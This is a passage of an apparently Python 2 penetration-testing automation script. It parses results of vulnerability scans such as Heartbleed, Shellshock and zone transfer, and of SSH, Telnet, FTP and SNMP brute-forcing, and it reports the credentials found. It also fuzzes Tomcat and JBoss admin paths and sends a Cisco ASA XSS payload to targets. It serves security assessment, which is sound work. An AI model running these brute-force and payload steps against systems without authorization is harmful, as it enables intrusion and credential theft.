357 | secureList.append(x) 358 | for x in renegotiationInsecureList: 359 | if x in renegotiationSecureList: 360 | if x not in secureAndInsecureList: 361 | secureAndInsecureList.append(x) 362 | else: 363 | if x not in insecureList: 364 | insecureList.append(x) 365 | 366 | if len(secureAndInsecureList)>0: 367 | print "\n****** Secure and Insecure SSL Renegotatiation ****** " 368 | for x in secureAndInsecureList: 369 | print x 370 | if len(secureList)>0: 371 | print "\n****** Secure SSL Renegotatiation ****** " 372 | for x in secureList: 373 | print x 374 | if len(insecureList)>0: 375 | print "\n****** Insecure SSL Renegotatiation ****** " 376 | for x in insecureList: 377 | print x 378 | 379 | if len(sslv3List)>0: 380 | print "\n****** SSLv3 Supported ****** " 381 | for x in sslv3List: 382 | print x 383 | if len(sslv2List)>0: 384 | print "\n****** SSLv2 Supported ****** " 385 | for x in sslv2List: 386 | print x 387 | 388 | filename = "runSSLTlssled*.log" 389 | failedList=[] 390 | vulnList=[] 391 | for file in glob.glob(filename): 392 | lines=[] 393 | with open(file) as f: 394 | lines = f.read().splitlines() 395 | if "[*] Running sslscan on " not in str(lines): 396 | failedList.append(file) 397 | os.remove(origPath+"/"+file) 398 | 399 | if len(failedList)>0: 400 | print "\n****** Tlssled Failure ****** " 401 | for x in failedList: 402 | print x 403 | y = x.split(":") 404 | print "Please rerun 'python2.7 runMulti.py -tasks tlssled' to retest failed hosts" 405 | 406 | currentYear = (time.strftime("%Y")) 407 | currentMth = (time.strftime("%m")) 408 | currentDay = (time.strftime("%d")) 409 | 410 | currentDate = datetime.datetime(int(currentYear),int(currentMth),int(currentDay)) 411 | 412 | filename = "runXmpp_*.log" 413 | failedList=[] 414 | vulnList=[] 415 | for file in glob.glob(filename): 416 | tempTitle = file.replace("runXmpp_","") 417 | tempTitle = tempTitle.replace(".log","") 418 | tempTitle = tempTitle.replace("_",":") 419 | hostNo = tempTitle.split(":")[0] 420 | portNo = tempTitle.split(":")[1] 421 | lines=[] 422 | with open(file) as f: 423 | lines = f.read().splitlines() 424 | for x in lines: 425 | if "Valid credentials" in x: 426 | if x not in vulnList: 427 | vulnList.append(hostNo+":"+portNo,x) 428 | 429 | if len(vulnList)>0: 430 | print "\n****** Found the below credentials on XMPP server****** " 431 | for x in vulnList: 432 | print x 433 | 434 | filename = "runSSLCert_*.log" 435 | failedList=[] 436 | vulnList=[] 437 | for file in glob.glob(filename): 438 | lines=[] 439 | with open(file) as f: 440 | lines = f.read().splitlines() 441 | tempTitle = file.replace("runSSLCert_","") 442 | tempTitle = tempTitle.replace(".log","") 443 | tempTitle = tempTitle.replace("_",":") 444 | hostNo = tempTitle.split(":")[0] 445 | portNo = tempTitle.split(":")[1] 446 | for x in lines: 447 | if "Not valid after" in x: 448 | x = x.replace("Not valid after:","") 449 | x = x.replace("|","") 450 | y = x.split("T")[0] 451 | y = y.strip() 452 | try: 453 | certDateYear = int(y.split("-")[0]) 454 | certDateMth = int(y.split("-")[1]) 455 | certDateDay = int(str(y.split("-")[2]).split(" ")[0]) 456 | certDate = datetime.datetime(certDateYear,certDateMth,certDateDay) 457 | if currentDate>certDate: 458 | vulnList.append(tempTitle+"\t"+y) 459 | except ValueError: 460 | continue 461 | if len(vulnList)>0: 462 | print "\n****** Expired SSL Certificates ****** " 463 | for x in vulnList: 464 | print x 465 | 466 | vulnList=[] 467 | fileList=[] 468 | fileList.append("portFTP.txt") 469 | fileList.append("portTelnet.txt") 470 | for file in fileList: 471 | if os.path.exists(origPath+"/"+file): 472 | f = open(file,"r") 473 | lines = f.read().splitlines() 474 | for line in lines: 475 | vulnList.append(line) 476 | if len(vulnList)>0: 477 | print "\n****** Plaintext Protocols ****** " 478 | for x in vulnList: 479 | print x 480 | 481 | if len(failedList)>0: 482 | print "\n****** Hydra SSH Bruteforce Failure ****** " 483 | for x in failedList: 484 | print x 485 | y = x.split(":") 486 | print "Please rerun 'python2.7 runMulti.py -tasks ssh' to retest failed hosts" 487 | 488 | filename = "runHydraSSH_*.log" 489 | failedList=[] 490 | vulnList=[] 491 | for file in glob.glob(filename): 492 | lines=[] 493 | with open(file) as f: 494 | lines = f.read().splitlines() 495 | if "finished at " not in str(lines): 496 | failedList.append(file) 497 | os.remove(origPath+"/"+file) 498 | 499 | if len(failedList)>0: 500 | print "\n****** Hydra SSH Bruteforce Failure ****** " 501 | for x in failedList: 502 | print x 503 | y = x.split(":") 504 | print "Please rerun 'python2.7 runMulti.py -tasks ssh' to retest failed hosts" 505 | 506 | 507 | filename = "runHydraTelnet_*.log" 508 | failedList=[] 509 | vulnList=[] 510 | for file in glob.glob(filename): 511 | lines=[] 512 | with open(file) as f: 513 | lines = f.read().splitlines() 514 | if "finished at " not in str(lines): 515 | failedList.append(file) 516 | os.remove(origPath+"/"+file) 517 | 518 | if len(failedList)>0: 519 | print "\n****** Hydra Telnet Bruteforce Failure ****** " 520 | for x in failedList: 521 | print x 522 | y = x.split(":") 523 | print "Please rerun 'python2.7 runMulti.py -tasks telnet' to retest failed hosts" 524 | 525 | 526 | filename = "runHydraFTP_*.log" 527 | failedList=[] 528 | vulnList=[] 529 | for file in glob.glob(filename): 530 | lines=[] 531 | with open(file) as f: 532 | lines = f.read().splitlines() 533 | if "0 of 1 target completed" in str(lines): 534 | failedList.append(file) 535 | os.remove(origPath+"/"+file) 536 | 537 | if len(failedList)>0: 538 | print "\n****** Hydra FTP Bruteforce Failure ****** " 539 | for x in failedList: 540 | print x 541 | y = x.split(":") 542 | print "Please rerun 'python2.7 runMulti.py -tasks ftp' to retest failed hosts" 543 | 544 | 545 | filename = "runSSLHeartbleed_*.log" 546 | failedList=[] 547 | vulnList=[] 548 | notVulnList=[] 549 | for file in glob.glob(filename): 550 | lines=[] 551 | tempTitle = file.replace("runSSLHeartbleed_","") 552 | tempTitle = tempTitle.replace(".log","") 553 | tempTitle = tempTitle.replace("_",":") 554 | with open(file) as f: 555 | lines = f.read().splitlines() 556 | if "likely not vulnerable" in str(lines): 557 | if tempTitle not in notVulnList: 558 | notVulnList.append(tempTitle) 559 | else: 560 | if "vulnerable" in str(lines): 561 | if tempTitle not in notVulnList: 562 | if tempTitle not in vulnList: 563 | vulnList.append(tempTitle) 564 | else: 565 | if tempTitle not in failedList: 566 | failedList.append(tempTitle) 567 | if len(vulnList)>0: 568 | print "\n****** Vulnerable to Heartbleed ****** " 569 | for x in vulnList: 570 | print x 571 | #if len(failedList)>0: 572 | # print "\n****** Heartbleed Test issues ****** " 573 | # for x in failedList: 574 | # print x 575 | # hostNo = x.split(":") 576 | 577 | filename = "runSSLCCS_*.log" 578 | failedList=[] 579 | vulnList=[] 580 | for file in glob.glob(filename): 581 | lines=[] 582 | tempTitle = file.replace("runSSLCCS_","") 583 | tempTitle = tempTitle.replace(".log","") 584 | tempTitle = tempTitle.replace("_",":") 585 | with open(file) as f: 586 | lines = f.read().splitlines() 587 | for line in lines: 588 | line = line.strip() 589 | if "may allow" in line: 590 | if tempTitle not in vulnList: 591 | vulnList.append(tempTitle) 592 | if "Failure connecting to" in line: 593 | if tempTitle not in failedList: 594 | failedList.append(tempTitle) 595 | if len(failedList)>0: 596 | print "\n****** OpenSSL ChangeCipherSpec Scan Failure ****** " 597 | for x in failedList: 598 | print x 599 | y = x.split(":") 600 | filename = origPath+"/runSSLCCS_"+y[0]+"_"+y[1]+".log" 601 | os.remove(filename) 602 | print "Please rerun 'python2.7 runMulti.py -tasks sslccs' to retest failed hosts" 603 | if len(vulnList)>0: 604 | print "\n****** Vulnerable to OpenSSL ChangeCipherSpec Man-in-the-middle Flaw ******" 605 | for x in vulnList: 606 | print x 607 | 608 | filename = "runShellshock_*.log" 609 | failedList=[] 610 | vulnList=[] 611 | for file in glob.glob(filename): 612 | lines=[] 613 | tempTitle = file.replace("runShellshock_","") 614 | tempTitle = tempTitle.replace(".log","") 615 | tempTitle = tempTitle.replace("_",":") 616 | with open(file) as f: 617 | lines = f.read().splitlines() 618 | for line in lines: 619 | line = line.strip() 620 | if "looks vulnerable" in line: 621 | print line 622 | if tempTitle not in vulnList: 623 | vulnList.append(tempTitle) 624 | if "Failure connecting to" in line: 625 | if tempTitle not in failedList: 626 | failedList.append(tempTitle) 627 | if len(failedList)>0: 628 | print "\n****** Shellshock Test Failure ****** " 629 | for x in failedList: 630 | print x 631 | y = x.split(":") 632 | filename = origPath+"/runShellshock_"+y[0]+"_"+y[1]+".log" 633 | os.remove(filename) 634 | print "Please rerun 'python2.7 runMulti.py -tasks shellshock' to retest failed hosts" 635 | if len(vulnList)>0: 636 | print "\n****** Vulnerable to Shellshock ******" 637 | for x in vulnList: 638 | print x 639 | 640 | #SSL Known Key 641 | filename = "runSSLKnownKey_*.log" 642 | failedList=[] 643 | vulnList=[] 644 | for file in glob.glob(filename): 645 | lines=[] 646 | tempTitle = file.replace("runSSLKnownKey_","") 647 | tempTitle = tempTitle.replace(".log","") 648 | tempTitle = tempTitle.replace("_",":") 649 | with open(file) as f: 650 | lines = f.read().splitlines() 651 | for line in lines: 652 | line = line.strip() 653 | if "Found in " in line: 654 | if tempTitle not in vulnList: 655 | vulnList.append(tempTitle) 656 | if len(vulnList)>0: 657 | print "\n****** SSL-Known-Key in LittleBlackBox ******" 658 | for x in vulnList: 659 | print x 660 | ''' 661 | #Clusterd 662 | filename = "runClusterd_*.log" 663 | failedList=[] 664 | vulnList=[] 665 | for file in glob.glob(filename): 666 | lines=[] 667 | tempTitle = file.replace("runClusterd_","") 668 | tempTitle = tempTitle.replace(".log","") 669 | tempTitle = tempTitle.replace("_",":") 670 | tempTitle = tempTitle.replace("https:","https://") 671 | tempTitle = tempTitle.replace("http:","http://") 672 | with open(file) as f: 673 | lines = f.read().splitlines() 674 | for line in lines: 675 | line = line.strip() 676 | ansi_escape = re.compile(r'\x1b[^m]*m') 677 | line = ansi_escape.sub('', line) 678 | if "] " in line: 679 | line1 = line.split("\t") 680 | if tempTitle not in vulnList: 681 | vulnList.append(tempTitle+"\t"+line1[1]) 682 | if len(vulnList)>0: 683 | print "\n****** Clusterd Results ******" 684 | for x in vulnList: 685 | print x 686 | ''' 687 | 688 | #NTP Monlist 689 | filename = "runNTP.log" 690 | failedList=[] 691 | vulnList=[] 692 | lines=[] 693 | 694 | if os.path.exists(filename): 695 | with open(filename) as f: 696 | lines = f.read().splitlines() 697 | tempTitle="" 698 | for line in lines: 699 | line = line.strip() 700 | if "Nmap scan report for " in line: 701 | tempTitle = line.replace("Nmap scan report for ","") 702 | if "ntp-monlist:" in line: 703 | if tempTitle not in vulnList: 704 | vulnList.append(tempTitle) 705 | if len(vulnList)>0: 706 | print "\n****** NTP Monlist ******" 707 | for x in vulnList: 708 | print x 709 | 710 | #Tilde 711 | filename = "runTilde_*.log" 712 | failedList=[] 713 | vulnList=[] 714 | for file in glob.glob(filename): 715 | lines=[] 716 | tempTitle = file.replace("runTilde_","") 717 | tempTitle = tempTitle.replace(".log","") 718 | tempTitle = tempTitle.replace("_",":") 719 | with open(file) as f: 720 | lines = f.read().splitlines() 721 | found1=False 722 | tempList=[] 723 | tempTitle1="" 724 | for line in lines: 725 | line = line.strip() 726 | if "--------- Final Result ---------" in line.strip(): 727 | found1=True 728 | if tempTitle not in tempList: 729 | tempTitle1 = "\nThe below files and folders are enumerated on host: "+tempTitle 730 | #tempList.append("\n********** "+tempTitle+" **********") 731 | if "File(s) was/were found" in line.strip(): 732 | if "0 Dir(s) was/were found" in tempList and "0 File(s) was/were found" in tempList: 733 | continue 734 | else: 735 | if len(tempList)>1: 736 | vulnList.append(tempTitle1) 737 | for x in tempList: 738 | vulnList.append(x) 739 | tempList=[] 740 | found1=False 741 | if found1==True: 742 | if "Dir(s) was/were found" not in line and "--------- Final Result ---------" not in line and "requests have been sent to the server" not in line: 743 | tempList.append(line) 744 | 745 | if len(vulnList)>0: 746 | print "\n****** Hosts Vulnerable to Tilde Enumeration ******" 747 | for x in vulnList: 748 | print x 749 | #VPN 750 | filename = "runPort500_ikescan_*.log" 751 | failedList=[] 752 | vulnList=[] 753 | for file in glob.glob(filename): 754 | lines=[] 755 | tempTitle = file.replace("runPort500_ikescan_","") 756 | tempTitle = tempTitle.replace(".log","") 757 | tempTitle = tempTitle.replace("_",":") 758 | with open(file) as f: 759 | lines = f.read().splitlines() 760 | for line in lines: 761 | line = line.strip() 762 | if "DES" in line: 763 | if tempTitle not in vulnList: 764 | vulnList.append(tempTitle) 765 | if len(vulnList)>0: 766 | print "\n****** VPN Peer Supports Weak Encryption ******" 767 | for x in vulnList: 768 | print x 769 | 770 | vulnList=[] 771 | filename = "runShellshock_https_*.log" 772 | for file in glob.glob(filename): 773 | lines=[] 774 | tempTitle = file.replace("runShellshock_https_","") 775 | tempTitle = tempTitle.replace(".log","") 776 | tempTitle = tempTitle.replace("_",":") 777 | with open(file) as f: 778 | lines = f.read().splitlines() 779 | for line in lines: 780 | line = line.strip() 781 | if "looks vulnerable " in line: 782 | line = line.replace("Service Info: ","") 783 | if tempTitle not in vulnList: 784 | vulnList.append(tempTitle+"\t"+line) 785 | if len(vulnList)>0: 786 | print "\n****** Shellshock ******" 787 | for x in vulnList: 788 | print x 789 | 790 | #VPN Device Fingerprinting 791 | filename = "runPort500_ikeversion_*.log" 792 | failedList=[] 793 | vulnList=[] 794 | for file in glob.glob(filename): 795 | lines=[] 796 | tempTitle = file.replace("runPort500_ikeversion_","") 797 | tempTitle = tempTitle.replace(".log","") 798 | tempTitle = tempTitle.replace("_",":") 799 | with open(file) as f: 800 | lines = f.read().splitlines() 801 | for line in lines: 802 | line = line.strip() 803 | if "Service Info: " in line: 804 | line = line.replace("Service Info: ","") 805 | if tempTitle not in vulnList: 806 | vulnList.append(tempTitle+"\t"+line) 807 | if len(vulnList)>0: 808 | print "\n****** VPN Device Fingerprinting ******" 809 | for x in vulnList: 810 | print x 811 | 812 | #SNMP Bruteforce 813 | filename = "runSNMP_*.log" 814 | failedList=[] 815 | vulnList=[] 816 | for file in glob.glob(filename): 817 | lines=[] 818 | tempTitle = file.replace("runSNMP_","") 819 | tempTitle = tempTitle.replace(".log","") 820 | tempTitle = tempTitle.replace("_",":") 821 | with open(file) as f: 822 | lines = f.read().splitlines() 823 | for line in lines: 824 | line = line.strip() 825 | if "valid credentials" in line.lower(): 826 | line = line.replace("- Valid credentials","") 827 | line = line.replace("|_","") 828 | line = line.strip() 829 | if tempTitle not in vulnList: 830 | vulnList.append(tempTitle+"\t"+line) 831 | if len(vulnList)>0: 832 | print "\n****** SNMP Bruteforce ******" 833 | for x in vulnList: 834 | print x 835 | 836 | #Hydra SSH 837 | filename = "runHydraSSH_*.log" 838 | failedList=[] 839 | vulnList=[] 840 | for file in glob.glob(filename): 841 | lines=[] 842 | tempTitle = file.replace("runHydraSSH_","") 843 | tempTitle = tempTitle.replace(".log","") 844 | tempTitle = tempTitle.replace("_",":") 845 | with open(file) as f: 846 | lines = f.read().splitlines() 847 | for line in lines: 848 | line = line.strip() 849 | if "[ssh] host: " in line: 850 | if tempTitle not in vulnList: 851 | vulnList.append(line) 852 | if len(vulnList)>0: 853 | print "\n****** Hydra SSH Results ******" 854 | for x in vulnList: 855 | print x 856 | 857 | #DNS Zone Transfer 858 | filename = "runPort53_zonetransfer_*.log" 859 | failedList=[] 860 | vulnList=[] 861 | for file in glob.glob(filename): 862 | lines=[] 863 | tempTitle = file.replace("runPort53_zonetransfer_","") 864 | tempTitle = tempTitle.replace(".log","") 865 | tempTitle = tempTitle.replace("_",":") 866 | with open(file) as f: 867 | lines = f.read().splitlines() 868 | for line in lines: 869 | line = line.strip() 870 | if "dns-zone-transfer:" in line: 871 | if tempTitle not in vulnList: 872 | vulnList.append(tempTitle) 873 | if len(vulnList)>0: 874 | print "\n****** DNS Zone Transfer ******" 875 | for x in vulnList: 876 | print x 877 | 878 | def execute1(jobs, num_processes=2): 879 | work_queue = multiprocessing.Queue() 880 | for job in jobs: 881 | work_queue.put(job) 882 | 883 | result_queue = multiprocessing.Queue() 884 | worker = [] 885 | for i in range(int(num_processes)): 886 | worker.append(Worker1(work_queue, result_queue)) 887 | worker[i].start() 888 | 889 | results = [] 890 | while len(results) < len(jobs): 891 | result = result_queue.get() 892 | results.append(result) 893 | results.sort() 894 | return (results) 895 | os.chdir(origPath) 896 | 897 | tomcatFoundList=[] 898 | 899 | sslList=[] 900 | resultListwhatweb=[] 901 | resultListASAXSS=[] 902 | resultListshellshock=[] 903 | resultListclusterd=[] 904 | resultListsslcert=[] 905 | resultListsslknownkey=[] 906 | resultListsslccs=[] 907 | resultListheartbleed=[] 908 | resultListtlssled=[] 909 | resultListtelnet=[] 910 | resultListssh=[] 911 | resultListssl=[] 912 | resultList161=[] 913 | resultList3306=[] 914 | resultList6379=[] 915 | resultList1099=[] 916 | resultList5432=[] 917 | resultList2010=[] 918 | resultList27017=[] 919 | resultList512=[] 920 | resultList5900=[] 921 | resultList5222=[] 922 | resultList500=[] 923 | resultList5900=[] 924 | resultList25=[] 925 | resultList139=[] 926 | resultList512=[] 927 | resultList513=[] 928 | resultList554=[] 929 | resultList902=[] 930 | resultList2002=[] 931 | resultList2401=[] 932 | resultList8098=[] 933 | resultList9160=[] 934 | resultList873=[] 935 | resultList1080=[] 936 | resultList1723=[] 937 | resultList3389=[] 938 | resultList5432=[] 939 | resultList5666=[] 940 | resultList5850=[] 941 | resultList9390=[] 942 | resultList9391=[] 943 | resultList9929=[] 944 | resultList49152=[] 945 | resultList445=[] 946 | resultList137=[] 947 | resultList53=[] 948 | 949 | def chunk(input, size): 950 | return map(None, *([iter(input)] * size)) 951 | 952 | def testURLs(url): 953 | filename = origPath+"/uriList.txt" 954 | if not os.path.exists(filename): 955 | urllib.urlretrieve ("https://raw.githubusercontent.com/milo2012/metasploitHelper/master/uriList.txt","uriList.txt") 956 | wordList=[] 957 | wordList.append("/jmx-console") 958 | wordList.append("/web-console") 959 | wordList.append("/web-console/Invoker") 960 | wordList.append("/invoker/JMXInvokerServlet") 961 | wordList.append("/WEB-INF/jboss-web.xml") 962 | wordList.append("/examples") 963 | wordList.append("/examples/jsp/index.html") 964 | wordList.append("/examples/jsp/snp/snoop.jsp") 965 | wordList.append("/examples/jsp/source.jsp") 966 | wordList.append("/examples/servlet/HelloWorldExample") 967 | wordList.append("/examples/servlet/SnoopServlet") 968 | wordList.append("/examples/servlet/TroubleShooter") 969 | wordList.append("/examples/servlet/default/jsp/snp/snoop.jsp") 970 | wordList.append("/examples/servlet/default/jsp/source.jsp") 971 | wordList.append("/examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample") 972 | wordList.append("/examples/servlet/org.apache.catalina.INVOKER.SnoopServlet") 973 | wordList.append("/examples/servlet/org.apache.catalina.INVOKER.TroubleShooter") 974 | wordList.append("/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp") 975 | wordList.append("/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp") 976 | wordList.append("/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp") 977 | wordList.append("/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp") 978 | wordList.append("/examples/servlet/snoop") 979 | wordList.append("/examples/servlets/index.html") 980 | wordList.append("/jsp-examples") 981 | wordList.append("/manager") 982 | wordList.append("/manager/deploy?path=foo") 983 | wordList.append("/manager/html/") 984 | wordList.append("/servlet/default/") 985 | wordList.append("/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif") 986 | wordList.append("/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet") 987 | wordList.append("/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/") 988 | wordList.append("/servlet/org.apache.catalina.servlets.DefaultServlet/") 989 | wordList.append("/servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif") 990 | wordList.append("/servlet/org.apache.catalina.servlets.HTMLManagerServlet") 991 | wordList.append("/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif") 992 | wordList.append("/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet") 993 | wordList.append("/servlet/org.apache.catalina.servlets.ManagerServlet") 994 | wordList.append("/servlet/org.apache.catalina.servlets.SnoopAllServlet") 995 | wordList.append("/servlet/org.apache.catalina.servlets.WebdavServlet/") 996 | wordList.append("/tomcat-docs") 997 | wordList.append("/webdav") 998 | wordList.append("/webdav/index.html") 999 | wordList.append("/webdav/servlet/org.apache.catalina.servlets.WebdavServlet/") 1000 | wordList.append("/webdav/servlet/webdav/") 1001 | wordList.append("/conf/") 1002 | wordList.append("/conf/server.xml/") 1003 | wordList.append("/WEB-INF/") 1004 | wordList.append("/WEB-INF/web.xml") 1005 | wordList.append("/WEB-INF/classes/") 1006 | wordList.append("/shared/") 1007 | wordList.append("/shared/lib/") 1008 | 1009 | f = open(filename,"r") 1010 | lines = f.read().splitlines() 1011 | for line in lines: 1012 | wordList.append(line) 1013 | f.close() 1014 | 1015 | filename = open(origPath+"/tempFuzz.txt","w") 1016 | for uriPath in wordList: 1017 | filename.write(uriPath+"\n") 1018 | filename.close() 1019 | 1020 | if "https" in url: 1021 | url1 = url.replace("https://","") 1022 | hostList = url1.split(":") 1023 | hostNo = hostList[0].strip() 1024 | portNo = hostList[1].strip() 1025 | logFilename = origPath+"/runPatator_https_"+hostNo+"_"+portNo 1026 | else: 1027 | url1 = url.replace("http://","") 1028 | hostList = url1.split(":") 1029 | hostNo = hostList[0].strip() 1030 | portNo = hostList[1].strip() 1031 | logFilename = origPath+"/runPatator_http_"+hostNo+"_"+portNo 1032 | 1033 | count=0 1034 | resultList=[] 1035 | fullCmd = "cd "+patatorPath+" && python patator.py http_fuzz --threads="+str(numProcesses)+" method=HEAD url="+url+"FILE0 0="+origPath+"/tempFuzz.txt -l "+logFilename 1036 | if not os.path.exists(logFilename): 1037 | print "- Fuzzing file paths on "+url 1038 | #print fullCmd 1039 | results = RunCommand(fullCmd) 1040 | resultsList = results.split("\n") 1041 | count=0 1042 | for x in resultsList: 1043 | if ("200" in x or "401" in x): 1044 | uriPath = (x.split("|")[1]).strip() 1045 | statusCode = (x.split("|")[3]).strip() 1046 | if ("200" in statusCode or "401" in statusCode) and len(uriPath)>0: 1047 | resultList.append(url+uriPath+"\t"+statusCode) 1048 | count+=1 1049 | if uriPath=="/manager/html": 1050 | tomcatFoundList.append(url+uriPath) 1051 | if count<10: 1052 | for x in resultList: 1053 | print x 1054 | 1055 | #newUrl = url+uriPath 1056 | #(scheme, netloc, path, params, query, fragment) = urlparse.urlparse(newUrl) 1057 | #if "https" in url: 1058 | # conn = httplib.HTTPSConnection(netloc,timeout=10) 1059 | #else: 1060 | # conn = httplib.HTTPConnection(netloc,timeout=10) 1061 | #conn.request("HEAD", urlparse.urlunparse(('', '', path, params, query, fragment))) 1062 | #res = conn.getresponse() 1063 | #if res.status!=404: 1064 | #print newUrl+"\t"+str(res.status) 1065 | #print res.status, res.reason 1066 | 1067 | 1068 | def runModules(quiet): 1069 | cmdList = [] 1070 | jobs = [] 1071 | jobid = 0 1072 | 1073 | if (taskToRun=="5222" or taskToRun=="bruteURL" or taskToRun=="xmpp" or taskToRun=="yasuo" or taskToRun=="http" or taskToRun=="all" or taskToRun=="whatweb" or taskToRun=="clusterd" or taskToRun=="shellshock" or taskToRun=="asa" or taskToRun=="jboss" or taskToRun=="tomcat" or taskToRun=="dns"): 1074 | filename = origPath+"/portHTTP.txt" 1075 | httpList=[] 1076 | if os.path.exists(filename): 1077 | with open(filename) as f: 1078 | for line in f: 1079 | httpList.append(line) 1080 | for host in httpList: 1081 | host = host.strip() 1082 | host1 = host.replace("https://","") 1083 | host1 = host1.replace("http://","") 1084 | 1085 | hostList = host1.split(":") 1086 | hostNo = hostList[0].strip() 1087 | portNo = hostList[1].strip() 1088 | 1089 | if taskToRun=="bruteURL" or taskToRun=="all": 1090 | testURLs(host) 1091 | 1092 | #if taskToRun=="jboss" or taskToRun=="all": 1093 | # logFilename = origPath+"/runJboss_http_"+hostNo+"_"+portNo 1094 | # if not os.path.exists(logFilename): 1095 | # fullCmd = "cd "+patatorPath+" && python patator.py http_fuzz url=http://"+hostNo+":"+portNo+"FILE0 0="+toolsPath+"/JBoss.fuzz.txt -l "+logFilename 1096 | # if quiet==False: 1097 | # print fullCmd 1098 | # cmdList.append(["jboss",hostNo,fullCmd]) 1099 | 1100 | #if taskToRun=="tomcat" or taskToRun=="all": 1101 | # logFilename = origPath+"/runTomcat_http_"+hostNo+"_"+portNo 1102 | # if not os.path.exists(logFilename): 1103 | # fullCmd = "cd "+patatorPath+" && python patator.py http_fuzz url=http://"+hostNo+":"+portNo+"FILE0 0="+toolsPath+"/ApacheTomcat.fuzz.txt -l "+logFilename 1104 | # if quiet==False: 1105 | # print fullCmd 1106 | # cmdList.append(["tomcat",hostNo,fullCmd]) 1107 | 1108 | if taskToRun=="whatweb" or taskToRun=="all" or taskToRun=="http": 1109 | logFilename=origPath+"/runWhatWeb.log" 1110 | if not os.path.exists(logFilename): 1111 | fullCmd="ruby "+toolsPath+"/WhatWeb/whatweb -a 3 "+hostNo+":"+portNo+" 2>&1 >> "+logFilename 1112 | if quiet==False: 1113 | print fullCmd 1114 | cmdList.append(["whatsweb",hostNo,fullCmd]) 1115 | 1116 | if taskToRun=="shellshock" or taskToRun=="all" or taskToRun=="http": 1117 | logFilename = origPath+"/runShellshock_http_"+hostNo+"_"+portNo+".log" 1118 | if not os.path.exists(logFilename): 1119 | fullCmd = "python2.7 "+shellShockPath+"shocker.py --Hostname "+hostNo+" --cgilist "+shellShockPath+"/shocker-cgi_list --port "+portNo+" | tee -a "+logFilename 1120 | #fullCmd = "python2.7 "+shellShockPath+"shellshock_scanner.py "+origPath+"/portHTTP.txt "+shellShockPath+"cgi_list_example.txt -e 2 -w "+origPath+"/resultsHTTPs.csv --proto http -t 10" 1121 | if quiet==False: 1122 | print fullCmd 1123 | cmdList.append(["shellshock",hostNo,fullCmd]) 1124 | 1125 | #if taskToRun=="clusterd" or taskToRun=="all" or taskToRun=="http": 1126 | # logFilename = origPath+"/runClusterd_http_"+hostNo+"_"+portNo+".log" 1127 | # if not os.path.exists(logFilename): 1128 | # fullCmd = "cd "+clusterdPath+" && sudo python "+clusterdPath+"clusterd.py -i "+hostNo+" -p "+portNo+" | tee -a "+logFilename 1129 | # #fullCmd = "cd "+clusterdPath+" && sudo python "+clusterdPath+"clusterd.py -i "+hostNo+" -p "+portNo+" 2>&1 >> "+origPath+"/runClusterd_http_"+hostNo+"_"+portNo+".log" 1130 | # print fullCmd 1131 | # if quiet==False: 1132 | # print fullCmd 1133 | # cmdList.append(["clusterd",hostNo,fullCmd]) 1134 | 1135 | if taskToRun=="yasuo" or taskToRun=="all" or taskToRun=="http": 1136 | logFilename = origPath+"/runYasuo_http_"+hostNo+"_"+portNo+".log" 1137 | if not os.path.exists(logFilename): 1138 | fullCmd = "cd "+yasuoPath+" && sudo ruby yasuo.rb -r "+hostNo+" -p "+portNo+" -b all | sudo tee -a "+logFilename 1139 | if quiet==False: 1140 | print fullCmd 1141 | cmdList.append(["yasuo",hostNo,fullCmd]) 1142 | 1143 | 1144 | filename = origPath+"/portHTTPs.txt" 1145 | if os.path.exists(filename): 1146 | with open(filename) as f: 1147 | for line in f: 1148 | httpList.append(line) 1149 | for host in httpList: 1150 | if host.count(":")<2: 1151 | if "https" in host: 1152 | host = host+":443" 1153 | if "http" in host: 1154 | host = host+":80" 1155 | host = host.strip() 1156 | host1 = host.replace("https://","") 1157 | host1 = host1.replace("http://","") 1158 | 1159 | hostList = host1.split(":") 1160 | hostNo = hostList[0].strip() 1161 | portNo = hostList[1].strip() 1162 | 1163 | if taskToRun=="bruteURL" or taskToRun=="all": 1164 | testURLs(host) 1165 | 1166 | #if taskToRun=="jboss" or taskToRun=="all": 1167 | # logFilename = origPath+"/runJboss_https_"+hostNo+"_"+portNo 1168 | # if not os.path.exists(logFilename): 1169 | # fullCmd = "cd "+patatorPath+" && python patator.py http_fuzz url=https://"+hostNo+":"+portNo+"FILE0 0="+toolsPath+"/JBoss.fuzz.txt -l "+logFilename 1170 | # if quiet==False: 1171 | # print fullCmd 1172 | # cmdList.append(["jboss",hostNo,fullCmd]) 1173 | 1174 | #if taskToRun=="tomcat" or taskToRun=="all": 1175 | # logFilename = origPath+"/runTomcat_https_"+hostNo+"_"+portNo 1176 | # if not os.path.exists(logFilename): 1177 | # fullCmd = "cd "+patatorPath+" && python patator.py http_fuzz url=http://"+hostNo+":"+portNo+"FILE0 0="+toolsPath+"/ApacheTomcat.fuzz.txt -l "+logFilename 1178 | # if quiet==False: 1179 | # print fullCmd 1180 | # cmdList.append(["tomcat",hostNo,fullCmd]) 1181 | 1182 | if taskToRun=="asa" or taskToRun=="all": 1183 | if portNo=="443": 1184 | logFilename = origPath+"/runASAxss.log" 1185 | lines=[] 1186 | if os.path.exists(logFilename): 1187 | with open(logFilename) as f: 1188 | lines = f.read().splitlines() 1189 | if hostNo not in lines: 1190 | print "- Checking for ASA XSS: "+str(hostNo) 1191 | if checkForASA(hostNo)==True: 1192 | c = httplib.HTTPSConnection(hostNo) 1193 | c.request("GET", "/+CSCOE+/logon.html?reason=2&auth_handle=\"%20style%3dbehavior%3aurl('%23default%23time2')%20onbegin%3d'alert(String.fromCharCode(88,83,83))'") 1194 | response = c.getresponse() 1195 | if response.status==200: 1196 | data = response.read() 1197 | if "alert(String.fromCharCode(88,83,83))" in data: 1198 | resultListASAXSS.append(hostNo) 1199 | filename = open(logFilename,"a+") 1200 | filename.write(hostNo+"\n") 1201 | filename.close() 1202 | 1203 | 1204 | if 